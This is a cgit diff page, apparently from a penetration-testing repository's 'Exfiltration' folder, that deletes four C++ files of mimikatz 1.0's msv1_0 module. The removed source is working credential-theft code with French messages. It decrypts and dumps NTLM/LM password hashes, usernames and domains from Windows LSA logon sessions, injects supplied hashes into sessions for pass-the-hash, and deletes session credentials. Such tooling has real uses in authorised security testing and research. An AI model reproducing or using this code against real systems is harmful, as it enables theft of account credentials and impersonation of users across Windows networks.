aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages')
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp153
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h16
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp53
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h28
4 files changed, 0 insertions, 250 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp
deleted file mode 100644
index b429e5a..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp
+++ /dev/null
@@ -1,153 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "msv1_0.h"
-
-bool searchMSVFuncs()
-{
- if(!MSV1_0_MspAuthenticationPackageId)
- MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3;
- return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0));
-}
-
-bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
-{
- wostringstream maReponse;
- if(searchMSVFuncs())
- {
- unsigned short reservedSize = 0;
- PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL;
- if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize)))
- {
- wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword));
- wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword));
-
- if(justSecurity)
- maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
- else
- {
- maReponse << endl <<
- L"\t * Utilisateur : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl <<
- L"\t * Domaine : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl <<
- L"\t * Hash LM : " << lmHash << endl <<
- L"\t * Hash NTLM : " << ntHash;
- }
- SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds);
- }
- else maReponse << L"n.t. (LUID KO)";
- }
- else maReponse << L"n.a. (msv KO)";
-
- return sendTo(monPipe, maReponse.str());
-}
-
-__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0")));
- return getLogonData(monPipe, mesArguments, &monProvider);
-}
-
-__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- wostringstream maReponse;
- if(searchMSVFuncs())
- {
- if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2)
- {
- wstring idSecAppHigh = L"0";
- wstring idSecAppLow = mesArguments->front();
- if(mesArguments->size() > 1)
- {
- idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back();
- }
-
- LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
- if(idApp.LowPart != 0 || idApp.HighPart != 0)
- maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :(");
- else maReponse << L"LUID incorrect !";
- }
- else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow";
- }
- else maReponse << L"n.a. (msv KO)";
-
- maReponse << endl;
- return sendTo(monPipe, maReponse.str());
-}
-
-__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- wostringstream maReponse;
- if(searchMSVFuncs())
- {
- if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6)
- {
- MSV1_0_PRIMARY_CREDENTIAL kiwicreds;
- RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL));
-
- wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back();
- kiwicreds.LmPasswordPresent = FALSE;
- kiwicreds.NtPasswordPresent = TRUE;
-
- switch(mesArguments->size()) // méchants arguments utilisateurs
- {
- case 4:
- idSecAppLow = mesArguments->front();
- userName = mesArguments->at(1);
- domainName = mesArguments->at(2);
- break;
- case 6:
- idSecAppHigh = mesArguments->front();
- idSecAppLow = mesArguments->at(1);
- userName = mesArguments->at(2);
- domainName = mesArguments->at(3);
- kiwicreds.LmPasswordPresent = TRUE;
- lmHash = mesArguments->at(4);
- break;
- case 5:
- if(mesArguments->at(3).size() == 0x20)
- {
- idSecAppLow = mesArguments->front();
- userName = mesArguments->at(1);
- domainName = mesArguments->at(2);
- kiwicreds.LmPasswordPresent = TRUE;
- lmHash = mesArguments->at(3);
- }
- else
- {
- idSecAppHigh = mesArguments->front();
- idSecAppLow = mesArguments->at(1);
- userName = mesArguments->at(2);
- domainName = mesArguments->at(3);
- }
- break;
- }
-
- LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
-
- if(idApp.LowPart != 0 || idApp.HighPart != 0)
- {
- if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN)
- {
- mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName);
- mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine);
- if(kiwicreds.LmPasswordPresent)
- mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword);
- mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword);
-
- maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :(");
- }
- else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères";
- }
- else maReponse << L"LUID incorrect !";
- }
- else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM";
- }
- else maReponse << L"n.a. (msv KO)";
-
- maReponse << endl;
- return sendTo(monPipe, maReponse.str());
-}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h
deleted file mode 100644
index 4749573..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h
+++ /dev/null
@@ -1,16 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-#include "msv1_0_helper.h"
-
-bool searchMSVFuncs();
-bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
-
-__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
deleted file mode 100644
index 7ccb8e5..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
+++ /dev/null
@@ -1,53 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "msv1_0_helper.h"
-DWORD MSV1_0_MspAuthenticationPackageId = 0;
-
-void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative)
-{
- if(String->Buffer)
- String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress)));
-}
-
-NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize)
-{
- STRING PrimaryKeyValue, CredentialString;
- mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
-
- NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName);
- NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName);
- CredentialString.Buffer = reinterpret_cast<char *>(Credential);
- CredentialString.MaximumLength = CredentialString.Length = CredentialSize;
- SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length);
- return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString );
-}
-
-NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize)
-{
- ULONG QueryContext = 0, PrimaryKeyLength;
- STRING PrimaryKeyValue, CredentialString;
- mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
-
- NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString);
- if(NT_SUCCESS(retour))
- {
- SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length);
- *Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer;
- NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false);
- NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false);
- if (CredentialSize)
- *CredentialSize = CredentialString.Length;
- }
- return retour;
-}
-
-NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId)
-{
- STRING PrimaryKeyValue;
- mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
- return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue);
-} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
deleted file mode 100644
index e9afd03..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-
-#define MSV1_0_PRIMARY_KEY "Primary"
-extern DWORD MSV1_0_MspAuthenticationPackageId;
-
-typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
- LSA_UNICODE_STRING LogonDomainName;
- LSA_UNICODE_STRING UserName;
- BYTE NtOwfPassword[0x10];
- BYTE LmOwfPassword[0x10];
- BOOLEAN NtPasswordPresent;
- BOOLEAN LmPasswordPresent;
- wchar_t BuffDomaine[MAX_DOMAIN_LEN];
- wchar_t BuffUserName[MAX_USERNAME_LEN];
-} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
-
-void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true);
-
-NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize);
-NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize);
-NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId);
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-29 09:45:50 +0000